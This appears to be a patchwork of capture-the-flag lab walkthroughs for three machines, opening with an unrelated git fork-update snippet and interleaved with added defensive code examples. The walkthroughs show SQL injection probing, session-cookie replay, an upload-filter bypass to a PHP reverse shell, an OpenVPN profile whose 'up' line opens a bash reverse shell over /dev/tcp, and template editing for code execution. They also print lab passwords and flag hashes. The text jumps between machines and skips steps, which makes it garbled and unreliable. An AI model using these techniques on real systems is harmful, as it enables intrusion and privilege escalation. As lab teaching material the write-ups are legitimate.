Update forked repository after update of remote master branch.
Solution
# register the original repository as the remote "upstream"
$ git remote add upstream https://github.com/XXXXXXX/XXXXXXX.git
# fetch the upstream branches into the local repository
$ git fetch upstream
# switch to the local master branch
$ git checkout master
# fast-forward the local master to upstream/master
$ git merge --ff upstream/master
Besides, we can find an interesting PDF under the directory “/documents”.
By sending the following message, we can create a new credential “guest:guest”.
We can log in to the console with the credential “guest:guest”.
If we put a single quote in the UserID field and submit, we receive the following message.
This means this web app has a SQL injection vulnerability.
In this case, the URL we are redirected to is the following.
https://intra.redcross.htb/?o=%27&page=app
Now we have the following query, and we have to put something into the single quotes.
or dest like ''
If we put % there, we get the following output.
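To show why the single quote and the % wildcard behave as described above, here is an added example (not code from the original post) using an in-memory SQLite table that stands in for the app's table with its "dest" column; the table, rows and function names are constructed for illustration. It puts the concatenated query beside a parameterized one and also shows the caveat that a bound parameter alone does not neutralise LIKE wildcards:

```python
import sqlite3

# Constructed sample data standing in for the page's table with a "dest" column.
ROWS = [("alice", "intra"), ("bob", "admin"), ("carol", "intra")]


def _db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table msgs (sender text, dest text)")
    conn.executemany("insert into msgs values (?, ?)", ROWS)
    return conn


def vulnerable_lookup(dest):
    """String concatenation, as in the web app above: a quote ends the literal
    early (syntax error), and the caller also controls LIKE's own wildcards."""
    sql = "select sender from msgs where dest like '%s'" % dest
    return [r[0] for r in _db().execute(sql)]


def parameter_only_lookup(dest):
    """Bound parameter but no wildcard escaping: quotes are harmless, % is not."""
    sql = "select sender from msgs where dest like ?"
    return [r[0] for r in _db().execute(sql, (dest,))]


def escape_like(value, esc="\\"):
    """Escape LIKE metacharacters so user input is matched literally."""
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def safe_lookup(dest):
    """Bound parameter (no quoting problem) plus ESCAPE for % and _."""
    sql = "select sender from msgs where dest like ? escape '\\'"
    return [r[0] for r in _db().execute(sql, (escape_like(dest),))]
```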
It looks like there is an admin web app, and there is a subdomain for it.
Add the following line to “/etc/hosts” and try to access it.
10.10.10.113 admin.redcross.htb
We can find another login console.
We can try the credential “guest:guest”. However, it shows a message that we don’t have enough privilege.
Then, try a session replay attack.
Open Burp Suite and check the “PHPSESSID” in the Cookie header when we access “intra.redcross.htb”.
Then, turn intercept on and try to access “admin.redcross.htb”.
Check the value of “PHPSESSID” in the cookie and change it to the above session id.
We have to modify the following three requests.
Then, we can access the admin console of “admin.redcross.htb”.
By accessing “User Management”, we can create a new user on redcross.
We can use this credential for ssh login.
inari:YfXHf8ta
root@kali:~# ssh inari@10.10.10.113
inari@10.10.10.113's password: # YfXHf8ta
Linux redcross 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ id
uid=2020 gid=1001(associates) groups=1001(associates)
We can confirm we’re in a “jail”.
$ cd
-bash: cd: /var/jail/home: No such file or directory
We can enumerate some directories. However, there is nothing interesting.
Then, go back to the admin console. We still have another page, “Firewall”.
By providing our IP, we can put it in the “whitelist” of the “firewall”.
Try to scan the ports again.
root@kali:~# nmap -p- -sC -sV 10.10.10.113
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-14 12:59 EEST
Nmap scan report for intra.redcross.htb (10.10.10.113)
Host is up (0.035s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
| ssh-hostkey:
| 2048 67:d3:85:f8:ee:b8:06:23:59:d7:75:8e:a2:37:d0:a6 (RSA)
| 256 89:b4:65:27:1f:93:72:1a:bc:e3:22:70:90:db:35:96 (ECDSA)
|_ 256 66:bd:a1:1c:32:74:32:e2:e6:64:e8:a5:25:1b:4d:67 (ED25519)
80/tcp open http Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to https://intra.redcross.htb/
443/tcp open ssl/http Apache httpd 2.4.25
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was /?page=login
| ssl-cert: Subject: commonName=intra.redcross.htb/organizationName=Red Cross International/stateOrProvinceName=NY/countryName=US
| Not valid before: 2018-06-03T19:46:58
|_Not valid after: 2021-02-27T19:46:58
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
| http/1.1
~~~
| http/1.1
|_ http/1.1
1025/tcp open NFS-or-IIS?
5432/tcp open postgresql PostgreSQL DB 9.6.0 or later
| fingerprint-strings:
| SMBProgNeg:
| SFATAL
| VFATAL
| C0A000
| Munsupported frontend protocol 65363.19778: server supports 1.0 to 3.0
| Fpostmaster.c
| L2030
|_ RProcessStartupPacket
| ssl-cert: Subject: commonName=redcross.redcross.htb
| Subject Alternative Name: DNS:redcross.redcross.htb
| Not valid before: 2018-06-03T19:13:20
|_Not valid after: 2028-05-31T19:13:20
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5432-TCP:V=7.70%I=7%D=4/14%Time=5CB304BA%P=x86_64-pc-linux-gnu%r(SM
SF:BProgNeg,8C,"E\0\0\0\x8bSFATAL\0VFATAL\0C0A000\0Munsupported\x20fronten
SF:d\x20protocol\x2065363\.19778:\x20server\x20supports\x201\.0\x20to\x203
SF:\.0\0Fpostmaster\.c\0L2030\0RProcessStartupPacket\0\0");
Service Info: Hosts: RedCross, redcross.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 344.69 seconds
We can find additional services on port 1025 and port 5432.
By connecting with nc and waiting for a while, port 1025 gives us a response.
unix=> update passwd_table set gid = 27 where uid = 2020;
UPDATE 1
unix=> update passwd_table set homedir ='/root' where uid = 2020;
UPDATE 1
unix=> select * from passwd_table;
WARNING: terminal is not fully functional
- (press RETURN)
 username |               passwd               | uid  | gid  | gecos |    homedir     |   shell
----------+------------------------------------+------+------+-------+----------------+-----------
 tricia   | $1$WFsH/kvS$5gAjMYSvbpZFNu//uMPmp. | 2018 | 1001 |       | /var/jail/home | /bin/bash
 inari    | $1$oJkderY0$RHUnmknSOSToS9HpHcVaP1 | 2020 |   27 |       | /root          | /bin/bash
(2 rows)
Then, login as user inari with ssh.
Since group “sudo” can execute any command as root on this server, we can achieve a root shell by command “sudo -s”.
root@kali:~# ssh inari@10.10.10.113
inari@10.10.10.113's password:
Linux redcross 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 14 07:31:53 2019 from 10.10.14.23
Could not chdir to home directory /root: Permission denied
-bash: /root/.bash_profile: Permission denied
inari@redcross:/$ sudo -s
[sudo] password for inari:
root@redcross:/# cd /root
root@redcross:~# cat root.txt
892a1f4d018e5d382c4f5ee1b26717a4
In index.php, there is a message “We are proud to announce our first client: Sparklays (Sparklays.com still under construction)”.
Try to access /sparklays.
In “/sparklays/design/design.html”, we have a link to “/sparklays/design/changelogo.php”.
“changelogo.php” has a form through which we can upload a file.
If we upload an image file, we can find it in the directory “/sparklays/design/uploads/”.
This form has a file upload restriction, but by changing the file extension to “php5” and the Content-Type, we can bypass the restriction.
By accessing the uploaded PHP code, we can achieve a reverse shell.
# Access http://10.10.10.109/sparklays/design/uploads/php-reverse-shell.php5
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.23] from (UNKNOWN)[10.10.10.109] 37380
Linux ubuntu 4.13.0-45-generic #50~16.04.1-Ubuntu SMP Wed May 30 11:18:27 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
05:43:31 up 8:51, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data)gid=33(www-data)groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
In “/home/dave/Desktop”, we can find interesting files.
$ pwd
/home/dave/Desktop
$ ls -la
total 20
drwxr-xr-x 2 dave dave 4096 Sep 3 2018 .
drwxr-xr-x 18 dave dave 4096 Sep 3 2018 ..
-rw-rw-r-- 1 alex alex 74 Jul 17 2018 Servers
-rw-rw-r-- 1 alex alex 14 Jul 17 2018 key
-rw-rw-r-- 1 alex alex 20 Jul 17 2018 ssh
In the contents of “/home/dave/Desktop/ssh”, there is an ssh credential.
dave:Dav3therav3123
We can establish an ssh connection by taking advantage of that.
root@kali:~# ssh dave@10.10.10.109
dave@10.10.10.109's password: # Dav3therav3123
~~~
Last login: Sun Sep 2 07:17:32 2018 from 192.168.1.11
dave@ubuntu:~$
In the home directory, there is also an interesting file.
dave@ubuntu:~/Desktop$ cat Servers
DNS + Configurator - 192.168.122.4
Firewall - 192.168.122.5
The Vault - x
Besides, in “key”, we can find a simple text string.
dave@ubuntu:~/Desktop$ cat key
itscominghome
We can run nmap scans against these servers by using Proxychains.
First, add the following settings in “/etc/proxychains.conf”.
root@kali:~# tail /etc/proxychains.conf
## proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
Then, create a ssh connection.
root@kali:~# ssh -D 9050 dave@10.10.10.109
Then, execute the following command.
We can figure out that ssh and http are running on 192.168.122.4.
root@kali:~# proxychains nmap 10.10.10.109
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 18:20 EEST
|S-chain|-<>-127.0.0.1:9050-<><>-10.10.10.109:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-10.10.10.109:22-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-10.10.10.109:139-<--timeout
~~~
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.122.4:19350-<--timeout
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.122.4:9101-<--timeout
Nmap scan report for 192.168.122.4
Host is up (0.036s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 36.08 seconds
Then, see what the content of the HTTP server is.
root@kali:~# proxychains curl http://192.168.122.4/
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.122.4:80-<><>-OK
<h1> Welcome to the Sparklays DNS Server </h1>
<p>
<a href="dns-config.php">Click here to modify your DNS Settings</a><br>
<a href="vpnconfig.php">Click here to test your VPN Configuration</a>
We can try to open this website in a browser (but generally don’t run a web browser as root!).
In “/vpnconfig.php”, we can find a form through which we can edit and execute an .ovpn file.
After starting netcat, by posting the following data to “vpnconfig.php”, we can achieve a reverse shell from the VM “DNS”.
remote 192.168.122.1
dev tun
nobind
script-security 2
up "/bin/bash -c 'bash -i >& /dev/tcp/192.168.122.1/4444 0>&1'"
dave@ubuntu:~$ nc -nlvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.122.4] port 4444 [tcp/*] accepted (family 2, sport 35236)
bash: cannot set terminal process group (1123): Inappropriate ioctl for device
bash: no job control in this shell
root@DNS:/var/www/html#
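The profile above works because OpenVPN's `up` directive (enabled by `script-security 2`) runs an arbitrary program, so a form that accepts user-supplied .ovpn content must reject such directives. The following is an added example, not code from the original post or the Sparklays app: a validator that refuses every directive OpenVPN uses to run external programs and additionally allow-lists what a profile may contain. The allow-list and the two sample profiles are constructed for illustration; the "up" command in the sample is a placeholder.

```python
# Directives that make OpenVPN run external programs, or enable doing so.
EXEC_DIRECTIVES = {
    "script-security", "up", "down", "route-up", "route-pre-down", "ipchange",
    "client-connect", "client-disconnect", "learn-address",
    "auth-user-pass-verify", "tls-verify", "plugin",
}
# Hypothetical allow-list for one deployment; anything outside it is rejected too.
ALLOWED_DIRECTIVES = {
    "client", "remote", "dev", "proto", "port", "nobind", "resolv-retry",
    "persist-key", "persist-tun", "remote-cert-tls", "cipher", "auth", "verb",
    "ca", "cert", "key", "tls-auth", "key-direction",
}

def check_ovpn(text):
    """Return (line_no, directive, reason) for every line that must be rejected;
    an empty list means the profile only contains allow-listed directives."""
    problems = []
    inline_block = None
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if inline_block:                                  # inside <ca> ... </ca>
            if line == "</%s>" % inline_block:
                inline_block = None
            continue
        if not line or line[0] in "#;":                   # blank line or comment
            continue
        if line.startswith("<") and line.endswith(">"):  # start of an inline block
            inline_block = line[1:-1]
            continue
        directive = line.split()[0]
        if directive in EXEC_DIRECTIVES:
            problems.append((n, directive, "executes external commands"))
        elif directive not in ALLOWED_DIRECTIVES:
            problems.append((n, directive, "not in allow-list"))
    return problems

# Constructed profile shaped like the one posted above, with a placeholder command.
MALICIOUS_PROFILE = """\
remote 192.168.122.1
dev tun
nobind
script-security 2
up "/bin/sh -c 'PLACEHOLDER_COMMAND'"
"""
# Constructed profile that uses only allow-listed directives.
CLEAN_PROFILE = "client\nremote vpn.example.test 1194\ndev tun\nnobind\n<ca>\nPLACEHOLDER_PEM\n</ca>\n"
```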
In directory “/home/dave” on DNS, we can find an interesting file.
root@DNS:/home/dave# cat ssh
cat ssh
dave
dav3gerous567
This is a credential with which we can access “DNS” over ssh.
dave@ubuntu:~$ ssh dave@192.168.122.4
dave@192.168.122.4's password: # dav3gerous567
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-116-generic i686)
~~~
Last login: Sat Apr 6 10:28:23 2019 from 192.168.122.1
dave@DNS:~$
With the following command, we can figure out that we can execute any command as root.
dave@DNS:/home$ sudo -l
[sudo] password for dave:
Matching Defaults entries for dave on DNS:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dave may run the following commands on DNS:
(ALL : ALL) ALL
Besides, in “/etc/hosts”, we can find the IP address of “vault”.
dave@DNS:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 DNS
192.168.5.2 Vault
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
If we search for this IP address elsewhere, we can find it in “auth.log”.
This looks like nmap being executed with source port 4444.
If we execute this command, we can see an unknown service running on port 987.
root@DNS:~# nmap 192.168.5.2 --source-port=4444
Starting Nmap 7.01 ( https://nmap.org ) at 2019-04-06 22:50 BST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for Vault (192.168.5.2)
Host is up (0.0023s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
987/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 25.84 seconds
If we don’t specify the option “--source-port=4444”, we don’t see any result.
root@DNS:~# nmap 192.168.5.2
Starting Nmap 7.01 ( https://nmap.org ) at 2019-04-06 22:53 BST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.04 seconds
By running nc from DNS, we can figure out that the service running on port 987 is ssh.
We can confirm that we opened port 1234 on localhost with “netstat”.
root@DNS:~# netstat -nlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:1234 0.0.0.0:* LISTEN 14274/ncat
With the following command, we can connect to the VM “Vault”.
root@DNS:~# ssh dave@127.0.0.1 -p 1234
dave@127.0.0.1's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-116-generic i686)
~~~
Last login: Sat Apr 6 12:36:57 2019 from 192.168.122.4
dave@vault:~$
In the home directory of dave, we can find a gpg-encrypted file “root.txt.gpg”.
dave@vault:~$ ls -l
total 4
-rw-rw-r-- 1 dave dave 629 Sep 3 2018 root.txt.gpg
dave@vault:~$ file root.txt.gpg
root.txt.gpg: PGP RSA encrypted session key - keyid: 10C678C7 31FEBD1 RSA (Encrypt or Sign) 4096b .
It seems like we need a secret key to decrypt this file.
dave@vault:~$ gpg -d root.txt.gpg
gpg: directory `/home/dave/.gnupg' created
gpg: new configuration file `/home/dave/.gnupg/gpg.conf' created
gpg: WARNING: options in `/home/dave/.gnupg/gpg.conf' are not yet active during this run
gpg: keyring `/home/dave/.gnupg/secring.gpg' created
gpg: keyring `/home/dave/.gnupg/pubring.gpg' created
gpg: encrypted with RSA key, ID D1EB1F03
gpg: decryption failed: secret key not available
We need the secret key for this gpg file. We can find it on the VM “ubuntu” with the command “gpg --list-secret-keys”.
We can decrypt root.txt.gpg with the passphrase “itscominghome” found in the same directory.
dave@ubuntu:~$ cat Desktop/key
itscominghome
dave@ubuntu:~$ gpg -d root.txt.gpg
You need a passphrase to unlock the secret key for
user: "david <dave@david.com>"
4096-bit RSA key, ID D1EB1F03, created 2018-07-24 (main key ID 0FDFBFE4)
gpg: encrypted with 4096-bit RSA key, ID D1EB1F03, created 2018-07-24
"david <dave@david.com>"
ca468370b91d1f5906e31093d9bfe819
Now we have control of the admin console.
Try to upload our shellcode. Go to “Extensions” -> “Templates” -> “Templates”.
Then choose “Protostar Details and Files” -> “index.php”.
Now we have a console in which we can edit the source code of index.php.
Let’s add reverse shell code (example) here and access “http://10.10.10.150/index.php”. We can achieve a reverse shell.
# on localhost
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.23] from (UNKNOWN)[10.10.10.150] 43324
Linux curling 4.15.0-22-generic #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
14:32:45 up 3 days, 3:27, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data)gid=33(www-data)groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
However, we still do not have access permission to user.txt.
Then, extract data from the compressed bzip2 file.
We get a gzip compressed file.
root@kali:~# mv password_backup_bin.txt password_backup_bin.bz2
root@kali:~# bunzip2 password_backup_bin.bz2
root@kali:~# ls
Desktop Downloads password_backup Pictures Templates
Documents Music password_backup_bin Public Videos
root@kali:~# file password_backup_bin
password_backup_bin: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix, original size 141
Extract the compressed file again.
We get a new bzip2 file.
root@kali:~# mv password_backup_bin password_backup_bin.gz
root@kali:~# gunzip password_backup_bin.gz
root@kali:~# ls
Desktop Documents Downloads Music password_backup password_backup_bin Pictures Public Templates Videos
root@kali:~# file password_backup_bin
password_backup_bin: bzip2 compressed data, block size = 900k
Extract the new bzip2 file. We obtain a tar file.
root@kali:~# mv password_backup_bin password_backup_bin.bz2
root@kali:~# ls
Desktop Documents Downloads Music password_backup password_backup_bin Pictures Public Templates Videos
root@kali:~# file password_backup_bin
password_backup_bin: POSIX tar archive (GNU)
Finally, extract the tar archive obtained in the last step. We get an interesting file, “password.txt”.
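The manual mv/file/bunzip2/gunzip loop above generalises to any chain of layers: identify each layer by its magic bytes rather than its name and peel until a tar archive appears. The following is an added example (not code from the original post) that does this, with a layer count and an inflated-size cap so a nested archive from an untrusted source cannot be used as a decompression bomb. The sample it unwraps is constructed in the block itself, with the same bzip2, gzip, bzip2, tar order as password_backup.

```python
import bz2
import gzip
import io
import tarfile

MAX_BYTES = 50 * 1024 * 1024   # stop inflating past this: decompression-bomb guard

def layer_type(data):
    """Identify a layer from its magic bytes rather than trusting the file name."""
    if data.startswith(b"BZh"):
        return "bzip2"
    if data.startswith(b"\x1f\x8b"):
        return "gzip"
    if len(data) >= 262 and data[257:262] == b"ustar":
        return "tar"
    return "unknown"

def unwrap(data, max_layers=10):
    """Peel compression layers until a tar archive appears.
    Returns (layer names seen, {member name: content bytes})."""
    layers = []
    for _ in range(max_layers):
        kind = layer_type(data)
        if kind == "bzip2":
            data = bz2.decompress(data)
        elif kind == "gzip":
            data = gzip.decompress(data)
        elif kind == "tar":
            layers.append(kind)
            with tarfile.open(fileobj=io.BytesIO(data)) as tf:
                return layers, {m.name: tf.extractfile(m).read() for m in tf if m.isfile()}
        else:
            raise ValueError("unrecognised data after layers %r" % layers)
        if len(data) > MAX_BYTES:
            raise ValueError("inflated past %d bytes after %r" % (MAX_BYTES, layers))
        layers.append(kind)
    raise ValueError("more than %d layers" % max_layers)

def build_sample():
    """Constructed stand-in for password_backup: a tar archive wrapped in bzip2,
    then gzip, then bzip2 again (outermost), the chain the page unpacks."""
    body = b"constructed sample, not the real password.txt\n"
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        info = tarfile.TarInfo("password.txt")
        info.size = len(body)
        tf.addfile(info, io.BytesIO(body))
    return bz2.compress(gzip.compress(bz2.compress(buf.getvalue())))
```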